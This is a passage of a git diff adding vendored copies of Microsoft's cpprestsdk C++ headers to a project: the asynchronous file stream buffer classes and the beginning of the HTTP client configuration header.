pplx::task m_lastOperation; + +public: + async_operation_queue() { m_lastOperation = pplx::task_from_result(); } + + // It only accepts functors that take no argument and return pplx::task + // This function may execute op inline, thus it could throw immediately + template + auto enqueue_operation(Func&& op) -> decltype(op()) + { + decltype(op()) res; // res is task , which always has default constructor + if (m_lastOperation.is_done()) + { + res = op(); // Exceptions are expected to be thrown directly without catching + if (res.is_done()) return res; + } + else + { + res = m_lastOperation.then([=] { + return op(); // It will cause task unwrapping + }); + } + m_lastOperation = res.then([&](decltype(op())) { + // This empty task is necessary for keeping the rest of the operations on the list running + // even when the previous operation gets error. + // Don't observe exception here. + }); + return res; + } + + void wait() const { m_lastOperation.wait(); } +}; + +/// +/// Private stream buffer implementation for file streams. +/// The class itself should not be used in application code, it is used by the stream definitions farther down in the +/// header file. +/// +template +class basic_file_buffer : public details::streambuf_state_manager<_CharType> +{ +public: + typedef typename basic_streambuf<_CharType>::traits traits; + typedef typename basic_streambuf<_CharType>::int_type int_type; + typedef typename basic_streambuf<_CharType>::pos_type pos_type; + typedef typename basic_streambuf<_CharType>::off_type off_type; + + virtual ~basic_file_buffer() + { + if (this->can_read()) + { + this->_close_read().wait(); + } + + if (this->can_write()) + { + this->_close_write().wait(); + } + } + +protected: + /// + /// can_seek is used to determine whether a stream buffer supports seeking. + /// + virtual bool can_seek() const { return this->is_open(); } + + /// + /// has_size is used to determine whether a stream buffer supports size(). + /// + virtual bool has_size() const { return this->is_open(); } + + virtual utility::size64_t size() const + { + if (!this->is_open()) return 0; + return _get_size(m_info, sizeof(_CharType)); + } + + /// + /// Gets the stream buffer size, if one has been set. + /// + /// The direction of buffering (in or out) + /// An implementation that does not support buffering will always return '0'. + virtual size_t buffer_size(std::ios_base::openmode direction = std::ios_base::in) const + { + if (direction == std::ios_base::in) + return m_info->m_buffer_size; + else + return 0; + } + + /// + /// Sets the stream buffer implementation to buffer or not buffer. + /// + /// The size to use for internal buffering, 0 if no buffering should be done. + /// The direction of buffering (in or out) + /// An implementation that does not support buffering will silently ignore calls to this function and it + /// will not have + /// any effect on what is returned by subsequent calls to buffer_size(). + virtual void set_buffer_size(size_t size, std::ios_base::openmode direction = std::ios_base::in) + { + if (direction == std::ios_base::out) return; + + m_info->m_buffer_size = size; + + if (size == 0 && m_info->m_buffer != nullptr) + { + delete m_info->m_buffer; + m_info->m_buffer = nullptr; + } + } + + /// + /// For any input stream, in_avail returns the number of characters that are immediately available + /// to be consumed without blocking. May be used in conjunction with to read data without + /// incurring the overhead of using tasks. + /// + virtual size_t in_avail() const + { + pplx::extensibility::scoped_recursive_lock_t lck(m_info->m_lock); + + return _in_avail_unprot(); + } + + size_t _in_avail_unprot() const + { + if (!this->is_open()) return 0; + + if (m_info->m_buffer == nullptr || m_info->m_buffill == 0) return 0; + if (m_info->m_bufoff > m_info->m_rdpos || (m_info->m_bufoff + m_info->m_buffill) < m_info->m_rdpos) return 0; + + msl::safeint3::SafeInt rdpos(m_info->m_rdpos); + msl::safeint3::SafeInt buffill(m_info->m_buffill); + msl::safeint3::SafeInt bufpos = rdpos - m_info->m_bufoff; + + return buffill - bufpos; + } + + _file_info* _close_stream() + { + // indicate that we are no longer open + auto fileInfo = m_info; + m_info = nullptr; + return fileInfo; + } + + static pplx::task _close_file(_In_ _file_info* fileInfo) + { + pplx::task_completion_event result_tce; + auto callback = new _filestream_callback_close(result_tce); + + if (!_close_fsb_nolock(&fileInfo, callback)) + { + delete callback; + return pplx::task_from_result(); + } + return pplx::create_task(result_tce); + } + + // Workaround GCC compiler bug https://gcc.gnu.org/bugzilla/show_bug.cgi?id=58972 + void _invoke_parent_close_read() { streambuf_state_manager<_CharType>::_close_read(); } + + pplx::task _close_read() + { + return m_readOps.enqueue_operation([this] { + _invoke_parent_close_read(); + + if (this->can_write()) + { + return pplx::task_from_result(); + } + else + { + // Neither heads are open. Close the underlying device + // to indicate that we are no longer open + auto fileInfo = _close_stream(); + + return _close_file(fileInfo); + } + }); + } + + pplx::task _close_write() + { + streambuf_state_manager<_CharType>::_close_write(); + if (this->can_read()) + { + // Read head is still open. Just flush the write data + return flush_internal(); + } + else + { + // Neither heads are open. Close the underlying device + + // We need to flush all writes if the file was opened for writing. + return flush_internal().then([=](pplx::task flushTask) -> pplx::task { + // swallow exception from flush + try + { + flushTask.wait(); + } + catch (...) + { + } + + // indicate that we are no longer open + auto fileInfo = this->_close_stream(); + + return this->_close_file(fileInfo); + }); + } + } + + /// + /// Writes a single byte to an output stream. + /// + /// The byte to write + /// A task that holds the value of the byte written. This is EOF if the write operation + /// fails. + virtual pplx::task _putc(_CharType ch) + { + auto result_tce = pplx::task_completion_event(); + auto callback = new _filestream_callback_write(m_info, result_tce); + + // Potentially we should consider deprecating this API, it is TERRIBLY inefficient. + std::shared_ptr<_CharType> sharedCh; + try + { + sharedCh = std::make_shared<_CharType>(ch); + } + catch (const std::bad_alloc&) + { + delete callback; + throw; + } + + size_t written = _putn_fsb(m_info, callback, sharedCh.get(), 1, sizeof(_CharType)); + if (written == sizeof(_CharType)) + { + delete callback; + return pplx::task_from_result(ch); + } + + return pplx::create_task(result_tce).then([sharedCh](size_t) { return static_cast(*sharedCh); }); + } + + /// + /// Allocates a contiguous memory block and returns it. + /// + /// The number of characters to allocate. + /// A pointer to a block to write to, null if the stream buffer implementation does not support + /// alloc/commit. + _CharType* _alloc(size_t) { return nullptr; } + + /// + /// Submits a block already allocated by the stream buffer. + /// + /// Count of characters to be committed. + void _commit(size_t) {} + + /// + /// Gets a pointer to the next already allocated contiguous block of data. + /// + /// A reference to a pointer variable that will hold the address of the block on success. + /// The number of contiguous characters available at the address in 'ptr'. + /// true if the operation succeeded, false otherwise. + /// + /// A return of false does not necessarily indicate that a subsequent read operation would fail, only that + /// there is no block to return immediately or that the stream buffer does not support the operation. + /// The stream buffer may not de-allocate the block until is called. + /// If the end of the stream is reached, the function will return true, a null pointer, and a count of zero; + /// a subsequent read will not succeed. + /// + virtual bool acquire(_Out_ _CharType*& ptr, _Out_ size_t& count) + { + ptr = nullptr; + count = 0; + return false; + } + + /// + /// Releases a block of data acquired using . This frees the stream buffer to + /// de-allocate the memory, if it so desires. Move the read position ahead by the count. + /// + /// A pointer to the block of data to be released. + /// The number of characters that were read. + virtual void release(_Out_writes_(count) _CharType*, _In_ size_t count) { (void)(count); } + + /// + /// Writes a number of characters to the stream. + /// + /// A pointer to the block of data to be written. + /// The number of characters to write. + /// A task that holds the number of characters actually written, either 'count' or 0. + virtual pplx::task _putn(const _CharType* ptr, size_t count) + { + auto result_tce = pplx::task_completion_event(); + auto callback = new _filestream_callback_write(m_info, result_tce); + + size_t written = _putn_fsb(m_info, callback, ptr, count, sizeof(_CharType)); + + if (written != 0 && written != size_t(-1)) + { + delete callback; + written = written / sizeof(_CharType); + return pplx::task_from_result(written); + } + return pplx::create_task(result_tce); + } + + // Temporarily needed until the deprecated putn is removed. + virtual pplx::task _putn(const _CharType* ptr, size_t count, bool copy) + { + if (copy) + { + auto sharedData = std::make_shared>(ptr, ptr + count); + return _putn(ptr, count).then([sharedData](size_t size) { return size; }); + } + else + { + return _putn(ptr, count); + } + } + + /// + /// Reads a single byte from the stream and advance the read position. + /// + /// A task that holds the value of the byte read. This is EOF if the read fails. + virtual pplx::task _bumpc() + { + return m_readOps.enqueue_operation([this]() -> pplx::task { + if (_in_avail_unprot() > 0) + { + pplx::extensibility::scoped_recursive_lock_t lck(m_info->m_lock); + + // Check again once the lock is held. + + if (_in_avail_unprot() > 0) + { + auto bufoff = m_info->m_rdpos - m_info->m_bufoff; + _CharType ch = m_info->m_buffer[bufoff * sizeof(_CharType)]; + m_info->m_rdpos += 1; + return pplx::task_from_result(ch); + } + } + + auto result_tce = pplx::task_completion_event(); + auto callback = new _filestream_callback_bumpc(m_info, result_tce); + + size_t ch = _getn_fsb(m_info, callback, &callback->m_ch, 1, sizeof(_CharType)); + + if (ch == sizeof(_CharType)) + { + pplx::extensibility::scoped_recursive_lock_t lck(m_info->m_lock); + m_info->m_rdpos += 1; + _CharType ch1 = (_CharType)callback->m_ch; + delete callback; + return pplx::task_from_result(ch1); + } + return pplx::create_task(result_tce); + }); + } + + /// + /// Reads a single byte from the stream and advance the read position. + /// + /// The value of the byte. EOF if the read fails. if an asynchronous + /// read is required This is a synchronous operation, but is guaranteed to never block. + virtual int_type _sbumpc() + { + m_readOps.wait(); + if (m_info->m_atend) return traits::eof(); + + if (_in_avail_unprot() == 0) return traits::requires_async(); + + pplx::extensibility::scoped_recursive_lock_t lck(m_info->m_lock); + + if (_in_avail_unprot() == 0) return traits::requires_async(); + + auto bufoff = m_info->m_rdpos - m_info->m_bufoff; + _CharType ch = m_info->m_buffer[bufoff * sizeof(_CharType)]; + m_info->m_rdpos += 1; + return (int_type)ch; + } + + pplx::task _getcImpl() + { + if (_in_avail_unprot() > 0) + { + pplx::extensibility::scoped_recursive_lock_t lck(m_info->m_lock); + + // Check again once the lock is held. + + if (_in_avail_unprot() > 0) + { + auto bufoff = m_info->m_rdpos - m_info->m_bufoff; + _CharType ch = m_info->m_buffer[bufoff * sizeof(_CharType)]; + return pplx::task_from_result(ch); + } + } + + auto result_tce = pplx::task_completion_event(); + auto callback = new _filestream_callback_getc(m_info, result_tce); + + size_t ch = _getn_fsb(m_info, callback, &callback->m_ch, 1, sizeof(_CharType)); + + if (ch == sizeof(_CharType)) + { + pplx::extensibility::scoped_recursive_lock_t lck(m_info->m_lock); + _CharType ch1 = (_CharType)callback->m_ch; + delete callback; + return pplx::task_from_result(ch1); + } + return pplx::create_task(result_tce); + } + + /// + /// Reads a single byte from the stream without advancing the read position. + /// + /// The value of the byte. EOF if the read fails. + pplx::task _getc() + { + return m_readOps.enqueue_operation([this]() -> pplx::task { return _getcImpl(); }); + } + + /// + /// Reads a single byte from the stream without advancing the read position. + /// + /// The value of the byte. EOF if the read fails. if an asynchronous + /// read is required This is a synchronous operation, but is guaranteed to never block. + int_type _sgetc() + { + m_readOps.wait(); + if (m_info->m_atend) return traits::eof(); + + if (_in_avail_unprot() == 0) return traits::requires_async(); + + pplx::extensibility::scoped_recursive_lock_t lck(m_info->m_lock); + + if (_in_avail_unprot() == 0) return traits::requires_async(); + + auto bufoff = m_info->m_rdpos - m_info->m_bufoff; + _CharType ch = m_info->m_buffer[bufoff * sizeof(_CharType)]; + return (int_type)ch; + } + + /// + /// Advances the read position, then return the next character without advancing again. + /// + /// A task that holds the value of the byte, which is EOF if the read fails. + virtual pplx::task _nextc() + { + return m_readOps.enqueue_operation([this]() -> pplx::task { + _seekrdpos_fsb(m_info, m_info->m_rdpos + 1, sizeof(_CharType)); + if (m_info->m_atend) return pplx::task_from_result(basic_file_buffer<_CharType>::traits::eof()); + return this->_getcImpl(); + }); + } + + /// + /// Retreats the read position, then return the current character without advancing. + /// + /// A task that holds the value of the byte. The value is EOF if the read fails, + /// requires_async if an asynchronous read is required + virtual pplx::task _ungetc() + { + return m_readOps.enqueue_operation([this]() -> pplx::task { + if (m_info->m_rdpos == 0) + return pplx::task_from_result(basic_file_buffer<_CharType>::traits::eof()); + _seekrdpos_fsb(m_info, m_info->m_rdpos - 1, sizeof(_CharType)); + return this->_getcImpl(); + }); + } + + /// + /// Reads up to a given number of characters from the stream. + /// + /// The address of the target memory area + /// The maximum number of characters to read + /// A task that holds the number of characters read. This number is O if the end of the stream is + /// reached, EOF if there is some error. + virtual pplx::task _getn(_Out_writes_(count) _CharType* ptr, _In_ size_t count) + { + return m_readOps.enqueue_operation([=]() -> pplx::task { + if (m_info->m_atend || count == 0) return pplx::task_from_result(0); + + if (_in_avail_unprot() >= count) + { + pplx::extensibility::scoped_recursive_lock_t lck(m_info->m_lock); + + // Check again once the lock is held. + + if (_in_avail_unprot() >= count) + { + auto bufoff = m_info->m_rdpos - m_info->m_bufoff; + std::memcpy( + (void*)ptr, this->m_info->m_buffer + bufoff * sizeof(_CharType), count * sizeof(_CharType)); + + m_info->m_rdpos += count; + return pplx::task_from_result(count); + } + } + + auto result_tce = pplx::task_completion_event(); + auto callback = new _filestream_callback_read(m_info, result_tce); + + size_t read = _getn_fsb(m_info, callback, ptr, count, sizeof(_CharType)); + + if (read != 0 && read != size_t(-1)) + { + delete callback; + pplx::extensibility::scoped_recursive_lock_t lck(m_info->m_lock); + m_info->m_rdpos += read / sizeof(_CharType); + return pplx::task_from_result(read / sizeof(_CharType)); + } + return pplx::create_task(result_tce); + }); + } + + /// + /// Reads up to a given number of characters from the stream. + /// + /// The address of the target memory area + /// The maximum number of characters to read + /// The number of characters read. O if the end of the stream is reached or an asynchronous read is + /// required. This is a synchronous operation, but is guaranteed to never block. + size_t _sgetn(_Out_writes_(count) _CharType* ptr, _In_ size_t count) + { + m_readOps.wait(); + if (m_info->m_atend) return 0; + + if (count == 0 || in_avail() == 0) return 0; + + pplx::extensibility::scoped_recursive_lock_t lck(m_info->m_lock); + + size_t available = _in_avail_unprot(); + size_t copy = (count < available) ? count : available; + + auto bufoff = m_info->m_rdpos - m_info->m_bufoff; + std::memcpy((void*)ptr, this->m_info->m_buffer + bufoff * sizeof(_CharType), copy * sizeof(_CharType)); + + m_info->m_rdpos += copy; + m_info->m_atend = (copy < count); + return copy; + } + + /// + /// Copies up to a given number of characters from the stream. + /// + /// The address of the target memory area + /// The maximum number of characters to copy + /// The number of characters copied. O if the end of the stream is reached or an asynchronous read is + /// required. This is a synchronous operation, but is guaranteed to never block. + virtual size_t _scopy(_CharType*, size_t) { return 0; } + + /// + /// Gets the current read or write position in the stream. + /// + /// The I/O direction to seek (see remarks) + /// The current position. EOF if the operation fails. + /// Some streams may have separate write and read cursors. + /// For such streams, the direction parameter defines whether to move the read or the write + /// cursor. + virtual pos_type getpos(std::ios_base::openmode mode) const + { + return const_cast(this)->seekoff(0, std::ios_base::cur, mode); + } + + /// + /// Seeks to the given position. + /// + /// The offset from the beginning of the stream + /// The I/O direction to seek (see remarks) + /// The position. EOF if the operation fails. + /// Some streams may have separate write and read cursors. + /// For such streams, the direction parameter defines whether to move the read or the write + /// cursor. + virtual pos_type seekpos(pos_type pos, std::ios_base::openmode mode) + { + if (mode == std::ios_base::in) + { + m_readOps.wait(); + return (pos_type)_seekrdpos_fsb(m_info, size_t(pos), sizeof(_CharType)); + } + else if ((m_info->m_mode & std::ios::ios_base::app) == 0) + { + return (pos_type)_seekwrpos_fsb(m_info, size_t(pos), sizeof(_CharType)); + } + return (pos_type)Concurrency::streams::char_traits<_CharType>::eof(); + } + + /// + /// Seeks to a position given by a relative offset. + /// + /// The relative position to seek to + /// The starting point (beginning, end, current) for the seek. + /// The I/O direction to seek (see remarks) + /// The position. EOF if the operation fails. + /// Some streams may have separate write and read cursors. + /// For such streams, the mode parameter defines whether to move the read or the write cursor. + virtual pos_type seekoff(off_type offset, std::ios_base::seekdir way, std::ios_base::openmode mode) + { + if (mode == std::ios_base::in) + { + m_readOps.wait(); + size_t current_pos = static_cast(-1); + switch (way) + { + case std::ios_base::beg: return (pos_type)_seekrdpos_fsb(m_info, size_t(offset), sizeof(_CharType)); + case std::ios_base::cur: + return (pos_type)_seekrdpos_fsb(m_info, size_t(m_info->m_rdpos + offset), sizeof(_CharType)); + case std::ios_base::end: + current_pos = _seekrdtoend_fsb(m_info, int64_t(offset), sizeof(_CharType)); + if (current_pos == static_cast(-1)) + { + return -1; + } + return (pos_type)current_pos; + default: + // Fail on invalid input (_S_ios_seekdir_end) + assert(false); + } + } + else if ((m_info->m_mode & std::ios::ios_base::app) == 0) + { + switch (way) + { + case std::ios_base::beg: return (pos_type)_seekwrpos_fsb(m_info, size_t(offset), sizeof(_CharType)); + case std::ios_base::cur: + return (pos_type)_seekwrpos_fsb(m_info, size_t(m_info->m_wrpos + offset), sizeof(_CharType)); + case std::ios_base::end: return (pos_type)_seekwrpos_fsb(m_info, size_t(-1), sizeof(_CharType)); + default: + // Fail on invalid input (_S_ios_seekdir_end) + assert(false); + } + } + return (pos_type)traits::eof(); + } + + /// + /// For output streams, flush any internally buffered data to the underlying medium. + /// + virtual pplx::task _sync() + { + return flush_internal().then([]() { return true; }); + } + +private: + template + friend class ::concurrency::streams::file_buffer; + + pplx::task flush_internal() + { + pplx::task_completion_event result_tce; + auto callback = utility::details::make_unique<_filestream_callback_write_b>(m_info, result_tce); + + if (!_sync_fsb(m_info, callback.get())) + { + return pplx::task_from_exception(std::runtime_error("failure to flush stream")); + } + callback.release(); + return pplx::create_task(result_tce); + } + + basic_file_buffer(_In_ _file_info* info) : streambuf_state_manager<_CharType>(info->m_mode), m_info(info) {} + +#if !defined(__cplusplus_winrt) + static pplx::task>> open( + const utility::string_t& _Filename, + std::ios_base::openmode _Mode = std::ios_base::out, +#ifdef _WIN32 + int _Prot = (int)std::ios_base::_Openprot +#else + int _Prot = 0 // unsupported on Linux, for now +#endif + ) + { + auto result_tce = pplx::task_completion_event>>(); + auto callback = new _filestream_callback_open(result_tce); + _open_fsb_str(callback, _Filename.c_str(), _Mode, _Prot); + return pplx::create_task(result_tce); + } + +#else + static pplx::task>> open( + ::Windows::Storage::StorageFile ^ file, std::ios_base::openmode _Mode = std::ios_base::out) + { + auto result_tce = pplx::task_completion_event>>(); + auto callback = new _filestream_callback_open(result_tce); + _open_fsb_stf_str(callback, file, _Mode, 0); + return pplx::create_task(result_tce); + } +#endif + + class _filestream_callback_open : public details::_filestream_callback + { + public: + _filestream_callback_open(const pplx::task_completion_event>>& op) + : m_op(op) + { + } + + virtual void on_opened(_In_ _file_info* info) + { + m_op.set(std::shared_ptr>(new basic_file_buffer<_CharType>(info))); + delete this; + } + + virtual void on_error(const std::exception_ptr& e) + { + m_op.set_exception(e); + delete this; + } + + private: + pplx::task_completion_event>> m_op; + }; + + class _filestream_callback_close : public details::_filestream_callback + { + public: + _filestream_callback_close(const pplx::task_completion_event& op) : m_op(op) {} + + virtual void on_closed() + { + m_op.set(); + delete this; + } + + virtual void on_error(const std::exception_ptr& e) + { + m_op.set_exception(e); + delete this; + } + + private: + pplx::task_completion_event m_op; + }; + + template + class _filestream_callback_write : public details::_filestream_callback + { + public: + _filestream_callback_write(_In_ _file_info* info, const pplx::task_completion_event& op) + : m_info(info), m_op(op) + { + } + + virtual void on_completed(size_t result) + { + m_op.set((ResultType)result / sizeof(_CharType)); + delete this; + } + + virtual void on_error(const std::exception_ptr& e) + { + m_op.set_exception(e); + delete this; + } + + private: + _file_info* m_info; + pplx::task_completion_event m_op; + }; + + class _filestream_callback_write_b : public details::_filestream_callback + { + public: + _filestream_callback_write_b(_In_ _file_info* info, const pplx::task_completion_event& op) + : m_info(info), m_op(op) + { + } + + virtual void on_completed(size_t) + { + m_op.set(); + delete this; + } + + virtual void on_error(const std::exception_ptr& e) + { + m_op.set_exception(e); + delete this; + } + + private: + _file_info* m_info; + pplx::task_completion_event m_op; + }; + + class _filestream_callback_read : public details::_filestream_callback + { + public: + _filestream_callback_read(_In_ _file_info* info, const pplx::task_completion_event& op) + : m_info(info), m_op(op) + { + } + + virtual void on_completed(size_t result) + { + result = result / sizeof(_CharType); + m_info->m_rdpos += result; + m_op.set(result); + delete this; + } + + virtual void on_error(const std::exception_ptr& e) + { + m_op.set_exception(e); + delete this; + } + + private: + _file_info* m_info; + pplx::task_completion_event m_op; + }; + + class _filestream_callback_bumpc : public details::_filestream_callback + { + public: + _filestream_callback_bumpc(_In_ _file_info* info, const pplx::task_completion_event& op) + : m_ch(0), m_info(info), m_op(op) + { + } + + virtual void on_completed(size_t result) + { + if (result == sizeof(_CharType)) + { + m_info->m_rdpos += 1; + m_op.set(m_ch); + } + else + { + m_op.set(traits::eof()); + } + delete this; + } + + virtual void on_error(const std::exception_ptr& e) + { + m_op.set_exception(e); + delete this; + } + + int_type m_ch; + + private: + _file_info* m_info; + pplx::task_completion_event m_op; + }; + + class _filestream_callback_getc : public details::_filestream_callback + { + public: + _filestream_callback_getc(_In_ _file_info* info, const pplx::task_completion_event& op) + : m_ch(0), m_info(info), m_op(op) + { + } + + virtual void on_completed(size_t result) + { + if (result == sizeof(_CharType)) + { + m_op.set(m_ch); + } + else + { + m_op.set(traits::eof()); + } + delete this; + } + + int_type m_ch; + + virtual void on_error(const std::exception_ptr& e) + { + m_op.set_exception(e); + delete this; + } + + private: + _file_info* m_info; + pplx::task_completion_event m_op; + }; + + _file_info* m_info; + async_operation_queue m_readOps; +}; + +} // namespace details + +/// +/// Stream buffer for file streams. +/// +/// +/// The data type of the basic element of the file_buffer. +/// +template +class file_buffer +{ +public: +#if !defined(__cplusplus_winrt) + /// + /// Open a new stream buffer representing the given file. + /// + /// The name of the file + /// The opening mode of the file + /// The file protection mode + /// A task that returns an opened stream buffer on completion. + static pplx::task> open(const utility::string_t& file_name, + std::ios_base::openmode mode = std::ios_base::out, +#ifdef _WIN32 + int prot = _SH_DENYRD +#else + int prot = 0 // unsupported on Linux +#endif + ) + { + auto bfb = details::basic_file_buffer<_CharType>::open(file_name, mode, prot); + return bfb.then( + [](pplx::task>> op) -> streambuf<_CharType> { + return streambuf<_CharType>(op.get()); + }); + } + +#else + /// + /// Open a new stream buffer representing the given file. + /// + /// The StorageFile instance + /// The opening mode of the file + /// The file protection mode + /// A task that returns an opened stream buffer on completion. + static pplx::task> open(::Windows::Storage::StorageFile ^ file, + std::ios_base::openmode mode = std::ios_base::out) + { + auto bfb = details::basic_file_buffer<_CharType>::open(file, mode); + return bfb.then( + [](pplx::task>> op) -> streambuf<_CharType> { + return streambuf<_CharType>(op.get()); + }); + } +#endif +}; + +/// +/// File stream class containing factory functions for file streams. +/// +/// +/// The data type of the basic element of the file_stream. +/// +template +class file_stream +{ +public: +#if !defined(__cplusplus_winrt) + /// + /// Open a new input stream representing the given file. + /// The file should already exist on disk, or an exception will be thrown. + /// + /// The name of the file + /// The opening mode of the file + /// The file protection mode + /// A task that returns an opened input stream on completion. + static pplx::task> open_istream(const utility::string_t& file_name, + std::ios_base::openmode mode = std::ios_base::in, +#ifdef _WIN32 + int prot = (int)std::ios_base::_Openprot +#else + int prot = 0 +#endif + ) + { + mode |= std::ios_base::in; + return streams::file_buffer<_CharType>::open(file_name, mode, prot) + .then([](streams::streambuf<_CharType> buf) -> basic_istream<_CharType> { + return basic_istream<_CharType>(buf); + }); + } + + /// + /// Open a new output stream representing the given file. + /// If the file does not exist, it will be create unless the folder or directory + /// where it is to be found also does not exist. + /// + /// The name of the file + /// The opening mode of the file + /// The file protection mode + /// A task that returns an opened output stream on completion. + static pplx::task> open_ostream(const utility::string_t& file_name, + std::ios_base::openmode mode = std::ios_base::out, +#ifdef _WIN32 + int prot = (int)std::ios_base::_Openprot +#else + int prot = 0 +#endif + ) + { + mode |= std::ios_base::out; + return streams::file_buffer<_CharType>::open(file_name, mode, prot) + .then([](streams::streambuf<_CharType> buf) -> basic_ostream<_CharType> { + return basic_ostream<_CharType>(buf); + }); + } +#else + /// + /// Open a new input stream representing the given file. + /// The file should already exist on disk, or an exception will be thrown. + /// + /// The StorageFile reference representing the file + /// The opening mode of the file + /// A task that returns an opened input stream on completion. + static pplx::task> open_istream(::Windows::Storage::StorageFile ^ file, + std::ios_base::openmode mode = std::ios_base::in) + { + mode |= std::ios_base::in; + return streams::file_buffer<_CharType>::open(file, mode) + .then([](streams::streambuf<_CharType> buf) -> basic_istream<_CharType> { + return basic_istream<_CharType>(buf); + }); + } + + /// + /// Open a new output stream representing the given file. + /// If the file does not exist, it will be create unless the folder or directory + /// where it is to be found also does not exist. + /// + /// The StorageFile reference representing the file + /// The opening mode of the file + /// A task that returns an opened output stream on completion. + static pplx::task> open_ostream(::Windows::Storage::StorageFile ^ file, + std::ios_base::openmode mode = std::ios_base::out) + { + mode |= std::ios_base::out; + return streams::file_buffer<_CharType>::open(file, mode) + .then([](streams::streambuf<_CharType> buf) -> basic_ostream<_CharType> { + return basic_ostream<_CharType>(buf); + }); + } +#endif +}; + +typedef file_stream fstream; +} // namespace streams +} // namespace Concurrency + +#endif diff --git a/Src/Common/CppRestSdk/include/cpprest/http_client.h b/Src/Common/CppRestSdk/include/cpprest/http_client.h new file mode 100644 index 0000000..58ab16a --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/http_client.h @@ -0,0 +1,755 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * HTTP Library: Client-side APIs. + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ +#pragma once + +#define _NO_ASYNCRTIMP + +// Remove Boots dependency. +#define CPPREST_EXCLUDE_WEBSOCKETS + + // Static libraries for cpprestsdk. +#ifdef _WIN64 +#define CPPRESTSDK_ARCH "x64/" +#else +#define CPPRESTSDK_ARCH "x86/" +#endif + +#ifdef _DEBUG +#define CPPRESTSDK_BUILD_TYPE "debug/" +#else +#define CPPRESTSDK_BUILD_TYPE "release/" +#endif + +#pragma comment(lib, "Common/CppRestSdk/lib/" CPPRESTSDK_BUILD_TYPE CPPRESTSDK_ARCH "cpprest142_2_10.lib") +#undef CPPRESTSDK_ARCH +#undef CPPRESTSDK_BUILD_TYPE + +#pragma comment(lib, "crypt32.lib") +#pragma comment(lib, "bcrypt.lib") +#pragma comment(lib, "winhttp.lib") + +#ifndef CASA_HTTP_CLIENT_H +#define CASA_HTTP_CLIENT_H + +#if defined(__cplusplus_winrt) +#if !defined(__WRL_NO_DEFAULT_LIB__) +#define __WRL_NO_DEFAULT_LIB__ +#endif +#include +#include +namespace web +{ +namespace http +{ +namespace client +{ +typedef IXMLHTTPRequest2* native_handle; +} +} // namespace http +} // namespace web +#else +namespace web +{ +namespace http +{ +namespace client +{ +typedef void* native_handle; +} +} // namespace http +} // namespace web +#endif // __cplusplus_winrt + +#include "Common/CppRestSdk/include/cpprest/asyncrt_utils.h" +#include "Common/CppRestSdk/include/cpprest/details/basic_types.h" +#include "Common/CppRestSdk/include/cpprest/details/web_utilities.h" +#include "Common/CppRestSdk/include/cpprest/http_msg.h" +#include "Common/CppRestSdk/include/cpprest/json.h" +#include "Common/CppRestSdk/include/cpprest/uri.h" +#include "Common/CppRestSdk/include/pplx/pplxtasks.h" +#include +#include + +#if !defined(CPPREST_TARGET_XP) +#include "Common/CppRestSdk/include/cpprest/oauth1.h" +#endif + +#include "Common/CppRestSdk/include/cpprest/oauth2.h" + +#if !defined(_WIN32) && !defined(__cplusplus_winrt) || defined(CPPREST_FORCE_HTTP_CLIENT_ASIO) +#if defined(__clang__) +#pragma clang diagnostic push +#pragma clang diagnostic ignored "-Wconversion" +#endif +#include "boost/asio/ssl.hpp" +#if defined(__clang__) +#pragma clang diagnostic pop +#endif +#endif + +/// The web namespace contains functionality common to multiple protocols like HTTP and WebSockets. +namespace web +{ +/// Declarations and functionality for the HTTP protocol. +namespace http +{ +/// HTTP client side library. +namespace client +{ +// credentials and web_proxy class has been moved from web::http::client namespace to web namespace. +// The below using declarations ensure we don't break existing code. +// Please use the web::credentials and web::web_proxy class going forward. +using web::credentials; +using web::web_proxy; + +/// +/// HTTP client configuration class, used to set the possible configuration options +/// used to create an http_client instance. +/// +class http_client_config +{ +public: + http_client_config() + : m_guarantee_order(false) + , m_timeout(std::chrono::seconds(30)) + , m_chunksize(0) + , m_request_compressed(false) +#if !defined(__cplusplus_winrt) + , m_validate_certificates(true) +#endif +#if !defined(_WIN32) && !defined(__cplusplus_winrt) || defined(CPPREST_FORCE_HTTP_CLIENT_ASIO) + , m_tlsext_sni_enabled(true) +#endif +#if defined(_WIN32) && !defined(__cplusplus_winrt) + , m_buffer_request(false) +#endif + { + } + +#if !defined(CPPREST_TARGET_XP) + /// + /// Get OAuth 1.0 configuration. + /// + /// Shared pointer to OAuth 1.0 configuration. + const std::shared_ptr oauth1() const { return m_oauth1; } + + /// + /// Set OAuth 1.0 configuration. + /// + /// OAuth 1.0 configuration to set. + void set_oauth1(oauth1::experimental::oauth1_config config) + { + m_oauth1 = std::make_shared(std::move(config)); + } +#endif + + /// + /// Get OAuth 2.0 configuration. + /// + /// Shared pointer to OAuth 2.0 configuration. + const std::shared_ptr oauth2() const { return m_oauth2; } + + /// + /// Set OAuth 2.0 configuration. + /// + /// OAuth 2.0 configuration to set. + void set_oauth2(oauth2::experimental::oauth2_config config) + { + m_oauth2 = std::make_shared(std::move(config)); + } + + /// + /// Get the web proxy object + /// + /// A reference to the web proxy object. + const web_proxy& proxy() const { return m_proxy; } + + /// + /// Set the web proxy object + /// + /// A reference to the web proxy object. + void set_proxy(web_proxy proxy) { m_proxy = std::move(proxy); } + + /// + /// Get the client credentials + /// + /// A reference to the client credentials. + const http::client::credentials& credentials() const { return m_credentials; } + + /// + /// Set the client credentials + /// + /// A reference to the client credentials. + void set_credentials(const http::client::credentials& cred) { m_credentials = cred; } + + /// + /// Get the 'guarantee order' property + /// + /// The value of the property. + bool guarantee_order() const { return m_guarantee_order; } + + /// + /// Set the 'guarantee order' property + /// + /// The value of the property. + CASABLANCA_DEPRECATED( + "Confusing API will be removed in future releases. If you need to order HTTP requests use task continuations.") + void set_guarantee_order(bool guarantee_order) { m_guarantee_order = guarantee_order; } + + /// + /// Get the timeout + /// + /// The timeout (in seconds) used for each send and receive operation on the client. + utility::seconds timeout() const { return std::chrono::duration_cast(m_timeout); } + + /// + /// Get the timeout + /// + /// The timeout (in whatever duration) used for each send and receive operation on the client. + template + 